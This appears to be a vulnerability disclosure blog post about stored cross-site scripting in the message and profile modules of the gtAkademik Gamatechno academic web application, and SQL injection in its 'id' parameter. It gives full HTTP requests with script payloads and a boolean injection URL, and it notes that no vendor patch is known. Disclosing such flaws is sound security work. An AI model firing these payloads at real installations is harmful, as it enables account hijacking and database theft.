gtAkademik Gamatechno: SQL Injection and Persistent XSS

We discovered that gtAkademik Gamatechno web application is susceptible to SQL Injection and Cross-site Scripting (XSS).

Stored/Persistent XSS

The web application allows an attacker to inject XSS script inside the database (stored), because there is no sanitation process. There are 2 modules affected by XSS: Message Module and Update Profile Module.

Persistent XSS in Message Module

This module is used for internal messaging inside the gtAkademik. We are able to send an XSS-crafted message to others for example, to administrator user.

POST /index.php?pModule=zsinppiZmQ==&pSub=zsinppiZmQ==&pAct=0dWjlpylpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://1.1.1.1/index.php?pModule=zsinppiZmQ==&pSub=xNKho6almcWem9isk5uW&pAct=18yZqg==
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 169

data[MessageSender]=XXXXXXXXXX&data[MessageReceiver]=XXXXXXXXXX&data[MessageTitle]=<script>&data[MessageContent]=<script>alert("XSS");</script>act=doCompose&compBtn=Kirim

Persistent XSS in User Profile Module (save the user profile)

This module is used to update user profiles. We are able to inject an XSS into it and save the data to the database. As a result, anyone who tries to view any profile are vulnerable to XSS attack.

POST /index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://1.1.1.1/index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw==&sia=ydeoo3FhY5dibpNyaWJilWdqY2RhqsrPmM6Xy5+hoKfOzGOjpqSox52V2J6kqprHnqxfnaCbxtpl1p3YqpuVnY/TnKM=
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

tanggal=02/08/1988&alamat_asal=XXXXXXXXXX&alamat=<script>alert("XSS");</script>&no_hp_mhs=XXXXXXXXXX&nama_ayah=&nama_ibu=&alamat_ortu=&no_telp_ortu=&simpan=Simpan

SQL Injection

The web application is also susceptible to SQL injection vulnerability, because there is no sensitization process. This allows an attacker to extract contents from the database, uncovering a large amount of sensitive and important data, such as credentials.

The parameter ‘id’ is vulnerable to SQL Injection.

http://1.1.1.1/mod=transaksi_registrasi_pmb&sub=transaksi_detail&do=daftar&id=129000204' AND '1'='1

Impact

Malicious authenticated users can exploit this vulnerability to execute arbitrary script in the context of a logged in user’s session. Further attack, malicious authenticated users may use SQL injection vulnerability to execute arbitrary SQL queries, potentially viewing or modifying data on the backend database.

Solution

Currently, we are not aware if any updates or patch is available from the vendor.

Leave a Reply

Your email address will not be published. Required fields are marked *